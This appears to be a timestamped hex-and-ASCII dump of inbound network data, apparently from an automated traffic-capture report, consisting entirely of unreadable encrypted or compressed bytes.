                                                                                                                                                            2022-09-29 12:45:20 UTC29196INData Raw: 1b 2d db dd 07 13 8d b1 32 47 34 94 d6 17 21 95 f3 7b e6 f7 c2 03 ed fa 88 dd c7 52 98 9f 88 ca 87 8e 50 3d 0b af 3d d5 40 81 63 a4 ad e3 38 0e b5 6f 73 ed 52 f8 40 e2 fc ed f2 3a bc de fd 8a e5 88 90 6e 45 0d c0 a5 92 27 af 0f 90 02 c3 e4 f4 b3 0e a0 2e 6f 82 7e f1 9b 84 5b 87 6f 7c a1 1c c9 1d f1 e8 94 04 d1 1e 4f c5 f1 54 7c d1 fa 5a 84 75 ef fc d9 70 5f 03 c8 52 61 48 10 fa 59 e3 c5 fd af a3 10 c0 e5 cb a6 71 6c 45 10 30 47 3d 0a 46 63 8c 6c 98 0c 3b 42 fe 0d f5 be b0 06 67 df aa 72 06 80 e7 40 71 b6 66 7f 5b 01 3a bb b2 92 85 c4 1b 4a ec e1 80 f8 81 da ef ac 06 30 67 ff 4b 14 b4 93 59 67 fc 14 30 ce f6 05 aa 83 8a 51 58 02 db 82 de 31 e5 61 f0 7f d1 f2 92 e7 04 7d a2 1e e6 2b fb 59 8b 44 73 3d da b3 e9 dc 3c 23 f8 71 e5 5d 09 25 1c 91 45 bf 98 eb 1c
                                                                                                                                                            Data Ascii: -2G4!{RP==@c8osR@:nE'.o~[o|OT|Zup_RaHYqlE0G=Fcl;Bgr@qf[:J0gKYg0QX1a}+YDs=<#q]%E
                                                                                                                                                            2022-09-29 12:45:20 UTC29212INData Raw: a2 ab 4f 91 fa 40 39 07 cd 53 eb 88 47 9a d7 b8 c9 85 22 b3 0d 17 21 41 2c b2 13 6f e8 38 f5 34 1a f8 01 57 3c d9 78 3c 52 3c b9 7b f1 b0 6e 0b 7a 37 e3 2e 8c f7 0f 4f 61 73 a2 03 c3 ff 51 21 5d 97 ca 8a 8c 01 ea 5d ac 65 64 ec c6 94 78 37 57 d9 49 6b 7a 56 2f 34 88 32 5b 8d d9 f8 23 41 1e f4 49 97 c5 b5 8c ea 7d 17 4d 00 84 eb 6a 34 16 20 0f 98 df a2 5f 01 09 00 13 86 ae 65 17 4e 3f 80 e6 f9 a1 b0 9e f7 ef 1b 20 02 ea 72 12 8a 0c 74 b0 87 3d 52 74 ff 12 f0 6a 96 76 66 62 80 a9 ab 6b 31 32 08 13 cd 9a a8 41 09 4e 87 a9 14 87 69 41 07 dc 48 d5 a0 cc fe 79 a1 30 52 95 7f e8 71 f8 a7 e3 e0 6d 07 f8 c4 3f 6c ff 99 1c 5d d6 3b 64 d0 ee 24 f2 fd 82 cd 4b 94 b8 8e db f6 c6 bc 2b ee f0 3c fc 6a 59 06 f2 0f 8a 98 77 ea c0 c9 b3 8c fe b6 b3 ba c6 da f2 b8 22 47 9f
                                                                                                                                                            Data Ascii: O@9SG"!A,o84W<x<R<{nz7.OasQ!]]edx7WIkzV/42[#AI}Mj4 _eN? rt=Rtjvfbk12ANiAHy0Rqm?l];d$K+<jYw"G
                                                                                                                                                            2022-09-29 12:45:20 UTC29228INData Raw: 90 85 eb 85 b7 74 ee f9 1a e7 8e 0e 84 09 96 3f a4 07 9c 10 d1 d0 08 db 50 9b 85 d6 d8 db df 27 08 53 ca 2f c4 52 14 21 5d a0 f0 03 07 f5 29 be 46 d6 a4 cc 47 08 f6 89 33 5c 55 71 1a 1d cb 83 21 78 69 50 c3 57 6e 0d 61 5e 88 ba 61 23 4f 50 34 a3 69 38 1f 7b 0b 64 ba 06 06 ac 26 2f 4b 65 db fa a9 e4 9d 08 12 52 a7 ea f5 e8 87 0d 12 6f 7b b2 74 26 e5 bc 2c e5 7f 9f 4c bf af a4 25 59 89 c4 bf cf 75 a0 0b 5a 22 11 47 e8 64 0b 2a 4b 30 d7 a8 83 0a 88 39 12 8d 2f 7f 54 0d 07 b8 87 4c 97 19 2d 8f 1b 1f f0 3f 4e 34 47 05 91 72 cf 88 5d 19 7a 91 0a ec b7 fd 4a 4a f6 c5 67 44 ea 72 6b 7d dd bc 86 7a 36 e1 bf a9 8f f0 80 2a 4d 4d ae e0 09 dc d2 4d b5 d0 1d 65 01 94 18 09 cb e0 17 23 2b 58 48 df e9 08 42 a2 08 1d 30 d9 a3 46 e4 7f 06 11 d6 57 35 e6 4d 4b 70 eb 20 85
                                                                                                                                                            Data Ascii: t?P'S/R!])FG3\Uq!xiPWna^a#OP4i8{d&/KeRo{t&,L%YuZ"Gd*K09/TL-?N4Gr]zJJgDrk}z6*MMMe#+XHB0FW5MKp
                                                                                                                                                            2022-09-29 12:45:20 UTC29231INData Raw: c2 ae 1d d8 b7 3a b7 8b 6e a5 27 a6 88 4c 72 60 11 93 04 41 9e d4 11 4c 41 a8 f2 7f f6 00 c6 1f 15 48 6b a8 5e 6b 4b ae 2a ee 5f 5d 67 1f 40 36 12 1e be ba 80 1d bc e1 d8 d8 4e c8 04 56 6e ab 1f a2 ac 65 d7 cf d4 fc bb 0b 85 5e d2 83 23 b3 77 46 fe 35 21 5c 5d b3 e5 61 81 37 01 00 67 03 99 25 56 71 3b 67 f1 1d d8 66 ca ad 2b 8e ea e2 03 cb 2e f1 7d 21 73 b3 df f8 18 84 0e 44 cc 1b 07 01 7a 39 d6 9c f7 e0 5e 9d e8 05 b3 67 03 96 4d a4 69 a8 af 4c 14 8a 08 68 f9 7f 91 7f 92 34 1d 30 2c 68 39 b9 7d 47 9e 16 82 84 98 82 eb 1e 11 ad f7 32 9d 6e 17 28 36 72 5f 71 cf 06 d2 f8 e8 81 87 b7 63 82 1f be 08 8d f7 e5 2f d5 92 3a 8b b6 44 03 21 68 6d 85 a0 99 d8 c2 f4 bd fd 6f b8 b6 3c 48 72 a5 55 9c 00 5c 8b 21 2c cc bd f7 91 18 34 13 3f 02 e1 82 5a 01 15 0f c2 11 d3
                                                                                                                                                            Data Ascii: :n'Lr`ALAHk^kK*_]g@6NVne^#wF5!\]a7g%Vq;gf+.}!sDz9^gMiLh40,h9}G2n(6r_qc/:D!hmo<HrU\!,4?Z
                                                                                                                                                            2022-09-29 12:45:20 UTC29247INData Raw: 62 c5 9e b8 ca a1 17 45 e7 fe 04 97 d1 7d c3 09 f9 a0 a1 2f 8a fe 86 0a 74 3e e6 86 d8 ff 6b be e9 73 d8 dd d7 f4 89 00 cf df dc 11 5d 76 93 7f 35 0c bd 7a 2c 08 98 05 a0 86 5b ae 56 7a b5 1d 66 dd 2e c1 8b db dd 53 cf 33 0d 86 1a 7e 84 12 16 7e 42 b9 c0 7f e3 a6 76 48 63 23 38 e4 f9 1e 38 bf f7 ba d1 0a 06 1f e9 14 c9 47 84 3d 94 2f 22 ca e6 ed 91 01 42 7e 1e 9b 43 4f 38 6f 38 d3 71 05 4d 83 97 bf 5d 66 6c 8b df 1e ab ff 1c a8 17 9b 30 25 ec b7 be 87 da de fa 37 58 42 b9 e5 37 a3 9d 85 bc 15 6e 0b a7 f7 4a 50 1d 7b 7e d0 55 a2 b8 e9 94 f2 2c 68 3b 1d 12 3c 1e 31 73 77 38 2c 92 b7 e3 1b 34 4f 18 54 08 3d 9a a4 0f 46 c3 74 e9 9c db 33 91 9d 75 31 1d d6 7b c3 d3 77 08 9a e2 be f2 39 3d 80 9b 9b bb d0 23 a5 6e e5 5a 0a 57 93 c3 19 7a bf 6e 63 20 59 d5 c1 93
                                                                                                                                                            Data Ascii: bE}/t>ks]v5z,[Vzf.S3~~BvHc#88G=/"B~CO8o8qM]fl0%7XB7nJP{~U,h;<1sw8,4OT=Ft3u1{w9=#nZWznc Y
                                                                                                                                                            2022-09-29 12:45:20 UTC29263INData Raw: 03 6b b3 80 ac 5d 44 6f 33 e0 0c f3 11 80 4e d4 5e c2 cf 95 37 28 7b 8a 11 97 d0 c9 e6 47 8d ab 23 87 05 dc 5e b7 2e 8d a7 ad e5 be 0a 32 e6 76 a2 e9 f7 72 04 25 81 87 30 58 17 ef 9f 40 7c 90 fb 9b df a3 00 c5 75 d7 c5 47 f2 39 f3 15 3e ee bb 34 e5 eb 13 03 7f 18 e9 7b 3a 82 b0 c5 24 cc d6 67 8d ba 2f 92 cb 28 ca 8c 1a 0c 92 ae 0e d8 2c 61 64 1f da 26 a8 fd 13 d9 d3 89 b0 cc cb ed e1 cf 29 47 f6 7b e0 3d 50 da 47 84 ae 0d 32 b4 dd 81 44 1f e0 ce c5 66 be 0b a6 2b 88 a2 44 ba 8a 30 5f 2a 83 a9 d8 b7 53 8a 38 3e ca 92 9e bb 0e ce 3f 10 6d a9 f5 ca f3 df 48 df 99 23 68 6e d9 73 b3 b3 11 30 0a 84 0b da 53 f8 f5 85 46 d4 ef 30 44 5b b5 65 77 c0 42 b2 0e 8b b2 48 54 70 32 a8 19 56 04 2e c5 a3 6d 72 40 98 a0 b3 e4 e5 3c e3 21 96 a8 cb d0 20 3e 49 ba 4b cf 3f 6f
                                                                                                                                                            Data Ascii: k]Do3N^7({G#^.2vr%0X@|uG9>4{:$g/(,ad&)G{=PG2Df+D0_*S8>?mH#hns0SF0D[ewBHTp2V.mr@<! >IK?o
                                                                                                                                                            2022-09-29 12:45:20 UTC29279INData Raw: 71 1a 63 1e 2e 5a e2 4f 6e ee b0 c4 35 60 76 f4 4b 5c 30 47 c2 95 c7 85 3d 6c e5 ea b4 bb 7a 6f 8b ba 35 5b c4 5c ea d1 14 56 a3 68 7a 04 57 85 9c 0a 2f d7 ac 9d b6 f0 07 69 16 4c a9 a6 40 47 63 58 78 b4 5a 6a 68 a2 ad 4b 19 5c 9f 09 20 53 0c be b3 65 ca 7b ba c7 06 e2 fc fa a6 b2 69 f0 a3 8a c6 fa d7 4d c3 92 cf ca 87 03 bc 14 c4 5b ab da 43 97 e2 24 7f c7 f4 c1 3d 2a 3c bc e4 d9 bb b0 6a b2 96 58 1d 45 cc 4f 98 00 7b 4d 80 b1 3d 69 69 4b 4d d7 c1 9a 56 14 d1 0d 91 cc 6b 3a bb 87 5a 5e e7 8d 51 00 57 65 cb 7c 53 ef 6e 7f a6 28 17 8d 0e a4 1d 21 72 43 18 15 b4 92 0f fe dc 51 b8 e8 25 a0 99 aa 30 0d 2e a1 68 18 ea 2c 0f 5c 81 26 85 b1 25 37 f2 72 1b 00 e8 1c ad 05 e7 7e d6 0f 2d 30 04 f5 ee 40 b8 6e 22 86 d3 e9 f1 4d 39 69 e2 3a 28 9a bb 4f f9 92 93 c0 e2
                                                                                                                                                            Data Ascii: qc.ZOn5`vK\0G=lzo5[\VhzW/iL@GcXxZjhK\ Se{iM[C$=*<jXEO{M=iiKMVk:Z^QWe|Sn(!rCQ%0.h,\&%7r~-0@n"M9i:(O
                                                                                                                                                            2022-09-29 12:45:20 UTC29295INData Raw: 59 db ab d4 77 d2 71 d0 4f 61 7d ea b0 76 c1 43 c2 b6 c1 6a 71 c2 3b 1e 39 cc 60 3f 6c 05 55 c3 ab d6 55 ac fe f0 ad 0f 45 29 91 e5 9a c8 c0 ad 02 06 0c c5 f2 c1 b0 23 80 9d e2 42 96 c7 22 55 47 7f 1f 8c 22 da c4 3e 08 4a 38 61 f4 25 4d 6c 78 f8 cd d2 df ea 4e d2 35 c3 fd 41 dc e4 05 3a 64 10 31 d3 90 d9 00 08 0e c4 fa e5 8e 98 44 bc df b8 58 d6 a8 32 89 4f 77 f9 45 0e 7c 0a c2 ec 7a c3 ba 31 da c7 12 88 dd 0c ca 29 96 4d f8 0c e6 ce cc 4f d4 b5 99 38 23 82 b7 cd 5e 15 88 8b 10 ca 88 e1 3b 6e 8c ca 56 5a fb ed 73 2b 06 c2 e7 c6 af 36 a5 73 15 17 84 f5 3c 4a 0b 1d 06 d3 5b c5 39 35 bc 1f e5 3a b9 33 ae 88 b0 d8 c2 f7 b8 86 59 5e 26 33 7e de 45 ef c8 2d 0b ac 11 37 2b e8 b5 0a 61 e4 d1 fb da cd 79 48 0b 1d ce ea 43 ce a5 a7 d3 f2 f2 ba 00 26 4f 92 6d ff 68
                                                                                                                                                            Data Ascii: YwqOa}vCjq;9`?lUUE)#B"UG">J8a%MlxN5A:d1DX2OwE|z1)MO8#^;nVZs+6s<J[95:3Y^&3~E-7+ayHC&Omh
                                                                                                                                                            2022-09-29 12:45:20 UTC29311INData Raw: 5b e6 24 ed 22 df 08 9e ff ad d3 de 01 a8 36 b1 50 83 51 cd 5a e6 d7 64 28 6f aa 15 2b 81 4e 5f b5 2c 0f 8a 5b 28 af 47 7b 1e 13 9e 72 f1 c4 f1 90 72 3a d2 a2 53 8c 04 1f 73 77 cf 2c 1d c8 00 74 b0 6e 11 65 05 74 3d 3f 22 cd 17 aa bf c9 28 a5 c1 a6 ea cd 58 df 0a 8c b0 67 f2 f3 8e fe 6f 5e 95 44 bc 9b 8e b9 99 5b 9e a7 e8 1e 46 0a f1 11 de f6 44 f8 a6 84 0a 07 a4 b0 10 01 35 bc 79 8b c3 2e ec a1 14 c1 88 cb c2 05 6e 83 dd 10 a9 ed 55 c9 2e 8f 5f 64 16 26 f0 45 f6 a2 ae e5 50 18 44 1c 61 cd 71 be fa 7f 2e 65 43 ff e2 c1 b0 37 26 21 ee 00 c9 f4 79 90 13 d2 f7 d7 7c 7d b3 4a 27 58 aa 9a 75 b2 e2 34 e8 ae b0 6b ac d1 24 25 31 2f ae 14 7c 6c 4b cc c1 1a a7 33 0e 16 01 94 2e d2 5b 31 a1 c4 cb 26 84 2b 56 21 f8 32 58 ae af 3e d5 0d 76 f4 3a 31 65 33 cc 50 28 34
                                                                                                                                                            Data Ascii: [$"6PQZd(o+N_,[(G{rr:Ssw,tnet=?"(Xgo^D[FD5y.nU._d&EPDaq.eC7&!y|}J'Xu4k$%1/|lK3.[1&+V!2X>v:1e3P(4
                                                                                                                                                            2022-09-29 12:45:20 UTC29327INData Raw: e9 4a 54 b3 73 24 b7 6b 2f 54 b5 48 11 95 37 53 28 86 1f e8 10 d9 b5 bc 97 98 ed af 8f 9b e3 0d 5f 03 99 88 72 f0 06 7d e7 e3 f3 33 f0 1d f6 20 65 85 1d 8b 91 5b c0 1f 88 93 ed be fd 34 c7 ad 40 67 f0 34 b3 3a a5 e6 bd 77 c2 fb 06 55 97 b6 4f 12 48 e4 70 b0 99 15 79 75 47 9e 9e 01 da c3 2a 4a ab f8 4c 26 e1 5b d8 2a 67 d9 dd 99 bc 27 38 cb 67 9b f1 a9 9e 46 ea f1 ee 06 55 79 7d 77 96 84 0d 28 0a 6c 29 11 c5 fd d6 48 a8 c3 6d 26 93 e1 0c 96 01 0b fc f0 40 5a 71 26 1c 24 0a e7 8a f9 b7 f7 93 0a 03 9f 27 3d 16 79 d4 ef a4 d6 0d 1c 24 5d 92 9d b9 a7 12 0f b2 0d cf 04 cc c2 a4 a4 37 c5 e2 02 a7 f3 1e 8a 87 69 45 e5 ed c5 10 d3 c5 7f 4c bd 55 d5 ac f3 f5 ca 80 55 f8 33 10 e5 86 fe e2 c1 8a 0a 61 cb fd e5 e6 a3 f4 c5 3e ed 0b 4c f9 c3 50 3f 24 c1 38 b3 81 54 97
                                                                                                                                                            Data Ascii: JTs$k/TH7S(_r}3 e[4@g4:wUOHpyuG*JL&[*g'8gFUy}w(l)Hm&@Zq&$'=y$]7iELUU3a>LP?$8T
                                                                                                                                                            2022-09-29 12:45:20 UTC29343INData Raw: 86 12 f1 64 24 3b 54 93 06 ed 81 39 14 bf 3a b6 13 37 0c 01 24 ac 25 6f da 01 2c 8b 88 8f 06 71 56 ef 68 68 d5 3c 33 3e 13 e0 5b 7f 32 86 e7 d4 78 26 cd 78 55 22 5c 06 35 d3 21 21 ba 4b 8a 37 48 78 4e e9 34 39 0e bc 9b 0e ac 98 38 8f 13 db be 3d 4f fd b5 a0 5c f7 90 1a 85 d6 fe 74 3a 86 ec e2 b2 bb 02 09 25 72 de 09 c9 c9 09 6c fe 6e d0 c2 e0 dd b6 87 24 5a 71 d1 78 ae 3a ea 8e 4a 14 c3 1a 46 18 62 d6 6c 44 d2 69 3e 88 51 08 fc 93 60 2e 0a cf 61 55 98 ca f3 fb 14 1e 7b 1d 1a 2b 27 52 b7 33 6f 17 28 ad 2e 88 27 e4 03 1b 3d 20 94 4c c6 6f bb 98 3e 90 f6 12 1c 06 b9 42 96 e8 11 4c 67 6e 28 ba 15 d1 53 bd 2b cd d9 fb 94 8d 11 b8 3a 4e 34 ce c7 2c d8 3a d0 b2 7f b0 71 b9 2b b3 ac 2a 6b d1 0c 83 c6 ca 86 d8 cd 8f ec 05 b0 54 ac 4d 20 f9 06 79 15 24 0f 1a 2b 11
                                                                                                                                                            Data Ascii: d$;T9:7$%o,qVhh<3>[2x&xU"\5!!K7HxN498=O\t:%rln$Zqx:JFblDi>Q`.aU{+'R3o(.'= Lo>BLgn(S+:N4,:q+*kTM y$+
                                                                                                                                                            2022-09-29 12:45:20 UTC29359INData Raw: 90 94 1f f6 ac 52 3c 22 d0 9b 61 c4 3b 8b b8 ac 2a c2 54 d4 1b 7d 25 42 fa 1c 38 1a 53 10 c3 27 09 7f c2 53 0f fc 71 b0 2a 03 84 da 1c 76 3e 6e c2 8a 8b dc 79 02 7e cf 88 df 88 cc fa 0c 06 ff 8c 55 76 2d 0e 63 99 8c 3a 11 f0 a8 62 6b 6a 83 c6 64 af 46 c8 fc 8f 99 f3 25 8b 7b 96 5d e1 7b 46 f1 d3 95 a3 b0 66 e7 32 e2 52 4b 36 f5 02 be 46 90 0f c5 73 fd 33 0b 60 a8 de ff b5 84 3c de fa 62 27 1b 38 f5 3e 98 61 bc 74 4c 5d b3 37 ba 13 ab 99 c7 a3 1f 91 a4 aa 42 ba b0 68 d8 35 6a 7d b9 43 d6 b7 81 7a 06 f8 0e b6 fe e2 77 77 ee aa 70 d8 2e bc a8 d8 e4 41 4d 65 7a 87 17 25 9d 07 f0 fe 39 be f8 76 f8 3b 97 31 cd 31 65 a6 8a 4e 0c 9f c3 f1 8a 40 04 72 e9 6c 75 f6 fe e1 a9 16 4c 2f 34 42 b3 8a 2b ce b6 25 cc 44 1a 69 a8 69 cb b4 2d 21 4f ca 14 81 f0 50 5b 34 39 44
                                                                                                                                                            Data Ascii: R<"a;*T}%B8S'Sq*v>ny~Uv-c:bkjdF%{]{Ff2RK6Fs3`<b'8>atL]7Bh5j}Czwwp.AMez%9v;11eN@rluL/4B+%Dii-!OP[49D
                                                                                                                                                            2022-09-29 12:45:20 UTC29375INData Raw: 9a 49 21 53 7c f3 d1 99 e1 14 c7 6f 46 24 fb 34 7a d1 46 c6 70 0b 16 73 96 ef 4d d7 1a 7b cd a3 27 31 34 f3 c8 c7 53 75 5a 5b c5 76 9d 54 b9 bb 94 25 f4 f1 fd 59 7f 7c da 73 1e 12 3c 14 c1 72 b2 d2 6a 4f 5b 7d 46 83 4b 8b d5 93 a4 43 99 4f fa be 44 e8 ec be 85 70 50 1d b9 2e a7 8a 0d 72 b5 b8 3e ab c5 a6 e0 7c 95 3d 46 42 be 70 54 c6 51 8e bf 27 15 39 52 59 67 64 26 45 80 6a 90 18 25 4e 1d 27 1a 70 5d 80 02 1a ea ce fa d4 31 f8 b6 52 d4 b9 27 31 f5 99 e3 a9 bd 03 fc e1 d5 bd a7 81 9d 84 04 15 3c ae c5 8d 10 d7 75 68 c3 32 36 b5 db 37 4f bc 80 ab 10 3f cb 8d 7e 8c 00 d6 df d8 67 7a e0 28 ee f8 01 70 89 96 72 0c 9c 40 d7 72 d1 9c bc 56 c4 ee d1 c5 e3 96 24 89 f6 e6 e3 fe 55 27 95 a0 44 08 6c 03 06 90 a0 80 a7 c3 4d 03 b7 56 1a 9f 2a e5 62 58 95 f1 70 61 28
                                                                                                                                                            Data Ascii: I!S|oF$4zFpsM{'14SuZ[vT%Y|s<rjO[}FKCODpP.r>|=FBpTQ'9RYgd&Ej%N'p]1R'1<uh267O?~gz(pr@rV$U'DlMV*bXpa(
                                                                                                                                                            2022-09-29 12:45:20 UTC29391INData Raw: fa 29 a2 7c 06 e6 d4 a4 8c 16 85 f0 51 91 66 84 34 b0 e0 62 6a 11 19 e0 f7 8a 25 08 0f 9b 93 4c c5 5f 76 12 57 6f 97 5d 0b d4 a0 72 e8 9b 65 bf 0f 57 b0 87 5f f0 52 7b b2 4f 2d f4 93 3e f2 af 7c f9 b6 77 5d c0 e9 fa f8 93 cb 37 2a 82 8e 88 0d 2e 1f 44 b8 96 da f2 97 c3 b4 39 8c c2 6b 6f 5b 1a 48 66 e6 25 4a a0 f8 73 7c a0 58 82 da 6e 17 35 f4 54 a1 56 e4 20 eb d9 a8 cd 7c 98 7c 4a a5 27 17 a6 6c 30 4d 12 7b bc 42 dc fa 7c ae 03 d4 a1 5d bc 74 18 cb b9 80 de ba 30 e6 f4 cd ed 9a 1c 7c bd c8 c4 06 e4 cc 03 84 7f f1 94 29 9b 76 b5 9b 50 ee 7b 87 e4 83 e1 76 ae c5 00 38 f8 a5 7a 78 cb d0 bd 73 e8 6a 71 5e 27 f1 a0 5c f1 3c 20 ab 6c 05 1b 48 08 d9 61 bc ed c3 c8 f3 3f 68 c9 07 3c 23 93 ff 59 5a d3 90 af 76 d2 b9 b5 c3 ee f8 14 4c 6a 6b b1 97 02 e3 31 7a 39 4d
                                                                                                                                                            Data Ascii: )|Qf4bj%L_vWo]reW_R{O->|w]7*.D9ko[Hf%Js|Xn5TV ||J'l0M{B|]t0|)vP{v8zxsjq^'\< lHa?h<#YZvLjk1z9M
                                                                                                                                                            2022-09-29 12:45:20 UTC29407INData Raw: 74 d3 13 16 f3 06 bf 57 04 fd f8 c2 f7 46 8c 8c dd 74 35 62 5e 02 98 2d 1a 81 04 d9 d4 a2 00 f5 ae 65 ae 0d 11 44 f2 11 58 12 1b f0 52 80 bc 1f a9 7a 49 a7 c3 f2 d0 d1 ba 82 87 b4 c4 a1 ef 1c 9d e9 b4 e3 02 19 d5 40 88 b2 53 0f 31 9e 7b d4 96 cd 13 e4 22 8b 97 5c 14 e1 a7 e4 b3 b4 52 f4 d6 45 60 99 8b 23 bf 97 1b 1e e5 19 0a f4 ab 1c f1 1a a9 ea 17 6d 16 f4 1e 98 75 c8 3a 4c e9 3e 21 e1 8d d0 2d 29 41 bc 1f ee c3 26 a2 02 f6 66 e5 29 8b 57 fe d1 55 de ed 68 e4 fd 9b 83 2f 81 83 ca 9a f2 be 65 d5 92 2b 2e 51 84 fe 38 f4 cc 73 65 43 07 d1 ac 03 c9 bf 9c 35 8e 1e 1d 2f e9 55 3c 2a 4f 99 ab 2e 92 cb 21 da 80 f1 0d 67 83 e1 49 6b 73 3c 46 ed aa 41 4a 56 0e 54 7a 7c 9a 4d ac d3 5a 59 b7 6e 0c 35 e0 ba 44 71 f2 a1 6a 2d db 42 d4 ca 23 8f 4e 16 dc 5e 5f 3a 88 a2
                                                                                                                                                            Data Ascii: tWFt5b^-eDXRzI@S1{"\RE`#mu:L>!-)A&f)WUh/e+.Q8seC5/U<*O.!gIks<FAJVTz|MZYn5Dqj-B#N^_:
                                                                                                                                                            2022-09-29 12:45:20 UTC29423INData Raw: 30 36 c9 ca f8 6d c9 fe 90 0d da da b7 9b 7e e4 7d e9 74 5f 68 d9 d6 f2 76 18 50 ab 4c e1 e4 8a 68 80 e7 6f 5d b5 a1 68 1a 61 c6 66 19 f7 63 3a 94 2c f7 88 4a 1c 89 fd bf 6e 57 6c c3 2f aa 29 bf 8a f3 19 b7 d4 29 9b a4 d7 30 67 bf d2 2d f4 c6 33 7d b7 69 c9 31 72 b8 0b 28 d5 b6 8b d6 d2 e9 37 77 61 e1 85 66 cb 41 51 2c a8 75 88 3c 86 b5 f9 f6 b6 3c 0b 7b ed d4 18 7e 9b e4 7a 06 bf 6c de 29 db bc a5 c4 33 24 de e2 f1 a8 7b d5 16 50 09 6e 48 f8 a4 e8 47 d2 08 8c c5 b0 d2 c3 4c 69 be fa c4 46 04 ea 3d 6e 83 20 94 f2 de f8 4e 27 ef 30 35 32 6e 33 47 2d 25 ed d2 15 97 1d d7 74 dc 65 b6 07 ca 18 27 13 8a eb 84 95 dc 68 74 67 55 fa 84 26 5c f8 44 16 80 4f 70 de f3 f8 2a 07 e9 8b b6 4b 6b bd ab ba 2c 50 e2 1c 5b 37 01 5e be 67 01 59 28 91 ce a7 b0 6a 36 d1 41 17
                                                                                                                                                            Data Ascii: 06m~}t_hvPLho]hafc:,JnWl/))0g-3}i1r(7wafAQ,u<<{~zl)3${PnHGLiF=n N'052n3G-%te'htgU&\DOp*Kk,P[7^gY(j6A
                                                                                                                                                            2022-09-29 12:45:20 UTC29439INData Raw: 4a d1 e8 f5 f0 f1 78 0b cb 9b b4 31 8e 6c 7d d7 59 18 68 2e 7b db e2 a9 6c e2 43 d3 c1 c2 c9 01 c6 7e f7 7b 61 74 09 f8 be 95 3d 4e 55 f0 52 46 02 f7 d5 ae e3 ad 97 e2 dc de 39 fd 76 6e eb 7c a1 16 22 27 eb 37 ef 1b d3 00 11 16 80 a9 14 31 02 d9 b3 d1 d7 c5 6e 03 64 e1 9e 30 19 07 1f 09 c3 89 14 fe 5a 66 06 29 0d 61 71 9a 9d 57 ea 6b 93 c4 9a 85 80 84 02 3c 40 cd 12 71 f8 cd da 04 b0 ad 3a 1e a3 67 94 68 6b 40 95 ae 7d 3d 54 c8 5a ef 3d 3a 5e 92 5a c4 80 74 5d 84 1f aa 9b 46 19 f1 8a 1e d5 78 77 62 c7 12 af cf c1 7b 5b 41 f8 4b 34 65 02 d9 f0 40 2e ba 88 5e 23 93 4c 20 70 de fa 30 91 cd 46 4b c7 c4 68 74 9d 91 a8 26 2a f1 73 92 3c 85 fd e7 5d 9f ca 75 99 8a 30 dc 9e 09 b0 a9 f8 e8 dd 78 ac 35 c2 8c 42 73 61 c3 86 10 ba 14 ad 90 be 2f be f9 31 2e 85 21 09
                                                                                                                                                            Data Ascii: Jx1l}Yh.{lC~{at=NURF9vn|"'71nd0Zf)aqWk<@q:ghk@}=TZ=:^Zt]Fxwb{[AK4e@.^#L p0FKht&*s<]u0x5Bsa/1.!
                                                                                                                                                            2022-09-29 12:45:20 UTC29455INData Raw: 21 d2 4c 04 d9 45 17 b4 b9 ae d5 c0 88 25 30 2b 02 e8 53 4f d9 52 17 84 ab e4 de 49 ec 8d a9 02 82 46 ce 16 ce 14 83 d5 c0 ea fd 17 31 73 2a a2 dc 72 14 10 78 4b d2 7a 4d 1e 01 80 e9 b5 54 fd 10 2e 67 7f 61 c9 90 24 c9 e7 21 69 e1 ef 53 65 40 bd 43 73 19 35 6f f8 c7 80 6b 55 45 35 7c 06 29 6b 0d 47 93 3f 73 23 c1 c2 ec d7 16 3c 4d 81 bd 02 a8 48 73 a4 84 55 53 16 77 d9 24 92 9b 38 0a af c8 92 30 8e 17 fc eb b0 85 6c 81 4b 68 d0 fb 31 6f a1 a6 4c df 31 da 48 44 5a 2a 3f 81 44 aa e1 40 a4 80 31 c4 d7 b0 c3 94 d0 11 30 03 56 1b 7e 96 e0 2d 17 69 b7 93 32 54 06 34 bf ff f4 52 81 4f a5 a6 59 34 9a 1b 9a a3 e0 c9 71 6f 5c 50 ec ad e8 90 56 f2 7c ab 81 ed 7e e7 64 67 f4 45 1d f1 34 0b 95 30 b2 43 14 d3 8a ef 4b 52 18 6f 7b e7 07 b2 52 db 3e e5 f9 d4 43 ea 32 95
                                                                                                                                                            Data Ascii: !LE%0+SORIF1s*rxKzMT.ga$!iSe@Cs5okUE5|)kG?s#<MHsUSw$80lKh1oL1HDZ*?D@10V~-i2T4ROY4qo\PV|~dgE40CKRo{R>C2
                                                                                                                                                            2022-09-29 12:45:20 UTC29471INData Raw: c0 13 80 4f 77 02 3a 01 21 ee 63 54 df 21 a9 3b f6 aa a4 56 22 59 eb 64 62 1e f5 da d3 9d 48 58 03 46 41 d6 da b1 34 8e 6e b7 7e fc d3 b9 01 f8 4d 76 1d e5 be 64 3c 66 03 63 c1 77 29 1e 48 0a bd 51 a4 e4 4b f9 92 53 ab 9b 6b b8 c7 28 cb 11 90 03 36 b5 54 26 ec ac 0c 2b 04 b5 71 3d 3f 58 73 80 cd 3c 4b 1d ae 33 4f 7e 9f 9a 74 e2 bc f0 80 48 3c b6 32 1e 7e a0 1e e1 0e b3 b5 d6 6c 6f 60 23 11 7c af ec be 4b 5a 83 58 f0 23 df 05 01 7f d0 c7 0e 70 74 64 57 78 91 55 ad 9a 44 b2 33 53 50 ee 5e 5e 4d ec a1 b3 42 fe 16 f9 b0 8c 75 6c 29 09 aa f8 71 3e 41 a5 58 ab 8e db 41 56 c4 54 f1 3c c1 79 ee 7d 71 78 80 38 cf fa cd a0 f5 4a 89 5d ee 52 a0 35 94 37 fc e6 83 1b 05 76 23 93 1c dc 76 b1 ff c4 bf 71 25 81 e2 d7 f5 64 37 d1 2c 69 22 6e 72 36 f7 c3 5f 3d 59 f1 89 0b
                                                                                                                                                            Data Ascii: Ow:!cT!;V"YdbHXFA4n~Mvd<fcw)HQKSk(6T&+q=?Xs<K3O~tH<2~lo`#|KZX#ptdWxUD3SP^^MBul)q>AXAVT<y}qx8J]R57v#vq%d7,i"nr6_=Y
